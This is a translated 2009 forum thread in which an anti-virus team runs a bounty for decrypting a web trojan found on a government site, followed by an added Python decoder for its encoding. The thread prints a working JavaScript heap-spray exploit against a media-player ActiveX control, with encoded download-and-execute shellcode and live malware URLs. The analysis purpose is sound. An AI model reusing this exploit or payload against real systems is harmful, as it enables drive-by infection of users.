Malicious Website Exchange Board: Web Trojan Decryption Bounty, Round 8 (closed)
networkedition - 2009-7-8 13:34:00
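Quote:
http://www.rzgl.gov.cn/img/storm.htm
Quote:
Rules: 1. Decrypt everything in one go and attach the decryption log and steps (including SWF and PDF web trojans) to earn 10 prestige points; for a partial solution, each step earns 2 prestige points;
2. Members who take an active part in this event and win several times may be invited to join the Kaka Anti-Virus Team.
Quote:
Decryption tools:
Freshow (Chinese edition)
Redoce (Chinese edition)
Malzilla (Chinese-localized edition)
Quote:
Online analysis sites:
http://glacierlk.cn/openlab/jm.htm
http://www.cha88.cn/
Quote:
Note: members of the Kaka Anti-Virus Team may not take part.
Quote:
The malicious URL is a real, valid address intercepted by Rising's full-featured security software.
User system information: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)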
QoS - 2009-7-8 13:40:00
关于:hxxp://www.rzgl.gov.cn/img/storm.htm解密的日志(全体输出 - 2):
Level 0>http://www.rzgl.gov.cn/img/storm.htm
Level 1>http://www.rz168.com/edit/x.exe ●
日志由 Redoce1.9第68次修正版于 2009-7-8 下午 01:39:08 生成。
Only managed to decode one :kaka3:
happysunday2003 - 2009-7-8 14:11:00
Has it gone dead?
<meta http-equiv='refresh' content='3; url=/main.htm'>错误提示:<br><br>您访问的域名不存在,请确认输入了正确的网址。<br>系统2秒钟后将自动转向日照百事通主站,请稍候........................
networkedition - 2009-7-8 14:21:00
CODE:
<html>
<object classid="clsid:6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB" id='target'></object>
<body>
<SCRIPT language="JavaScript">
var shellcode1 = "tmp54EBtmp758Btmp8B3Ctmp3574tmp0378tmp56F5tmp768Btmp0320tmp33F5tmp49C9tmpAD41tmpDB33tmp0F36tmp14BEtmp3828tmp74F2tmpC108tmp0DCBtmpDA03tmpEB40tmp3BEFtmp75DFtmp5EE7tmp5E8Btmp0324tmp66DDtmp0C8Btmp8B4Btmp1C5EtmpDD03tmp048Btmp038BtmpC3C5tmp7275tmp6D6Ctmp6E6Ftmp642Etmp6C6Ctmp4300tmp5C3Atmp2e55tmp7865tmp0065tmpC033tmp0364tmp3040tmp0C78tmp408Btmp8B0Ctmp1C70tmp8BADtmp0840tmp09EBtmp408Btmp8D34tmp7C40tmp408Btmp953Ctmp8EBFtmp0E4EtmpE8ECtmpFF84tmpFFFFtmpEC83tmp8304tmp242CtmpFF3Ctmp95D0tmpBF50tmp1A36tmp702Ftmp6FE8tmpFFFFtmp8BFFtmp2454tmp8DFCtmpBA52tmpDB33tmp5353tmpEB52tmp5324tmpD0FFtmpBF5DtmpFE98tmp0E8Atmp53E8tmpFFFFtmp83FFtmp04ECtmp2C83tmp6224tmpD0FFtmp7EBFtmpE2D8tmpE873tmpFF40tmpFFFFtmpFF52tmpE8D0tmpFFD7tmpFFFFtmp7468tmp7074tmp2F3Atmp772Ftmp7777tmp722Etmp317Atmp3836tmp632Etmp6D6Ftmp652Ftmp6964tmp2F74tmp2E78tmp7865tmp0065";
var shellcode = unescape(shellcode1.replace(/tmp/g,"%u"));
var nop = "tmp9090tmp9090";
var dsffsgdfg = unescape(nop.replace(/tmp/g,"%u"));
while (dsffsgdfg.length<141) dsffsgdfg+=dsffsgdfg;
fillvcbcv = dsffsgdfg.substring(0, 141);
vcbcv = dsffsgdfg.substring(0, dsffsgdfg.length-141);
while(vcbcv.length+141<0x40000) vcbcv = vcbcv+vcbcv+fillvcbcv;
gdfgdh = new Array();
for (x=0; x<300; x++) gdfgdh[x] = vcbcv +shellcode;
var knell = '';
while (knell.length < 4057) knell+='\x0a\x0a\x0a\x0a';
target.rawParse(knell);
</script>
</body>
gtyre2 - 2009-7-8 14:23:00
It's the Baofeng Storm (暴风影音) one :kaka8:
var shellcode1 = 。。。。。。。。
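Added example, not part of any post in this thread and not the output of Redoce, Freshow or Malzilla: a static decoder for the `tmp`-for-`%u` substitution seen in the `shellcode1` string above, recovering embedded URLs without rendering the page. The function names, the sample bytes and the `example.invalid` URL are constructed for illustration.

```python
import re

UNIT = re.compile(r"%u([0-9A-Fa-f]{4})")
URL = re.compile(rb"https?://[\x21-\x7e]+")


def decode_units(encoded, marker="tmp"):
    """Return the bytes that unescape() would place in memory.

    The page hides '%u' behind a marker string. Each %uXXXX is one UTF-16
    code unit stored little-endian, so %u7468 is the two bytes 68 74 ("ht").
    """
    text = encoded.replace(marker, "%u")
    out = bytearray()
    pos = 0
    for m in UNIT.finditer(text):
        if m.start() != pos:  # junk between units: refuse to guess
            raise ValueError(f"unexpected data at offset {pos}")
        out += int(m.group(1), 16).to_bytes(2, "little")
        pos = m.end()
    if pos != len(text):  # truncated or malformed final unit
        raise ValueError(f"trailing data at offset {pos}")
    return bytes(out)


def encode_units(raw, marker="tmp"):
    """Inverse of decode_units, used only to build the constructed sample."""
    if len(raw) % 2:
        raw += b"\x00"  # pad to a whole 16-bit unit
    units = (int.from_bytes(raw[i:i + 2], "little") for i in range(0, len(raw), 2))
    return "".join(f"{marker}{u:04X}" for u in units)


def extract_urls(raw):
    """Find printable http(s) URLs in decoded bytes, defanged for logs."""
    return [u.decode("ascii").replace("http", "hxxp", 1) for u in URL.findall(raw)]


# Constructed sample: filler bytes followed by a NUL-terminated placeholder URL.
SAMPLE_RAW = b"\x01\x02\x03\x04\x05http://download.example.invalid/x.exe\x00"
SAMPLE = encode_units(SAMPLE_RAW)

if __name__ == "__main__":
    for url in extract_urls(decode_units(SAMPLE)):
        print("Level 1>", url)
```
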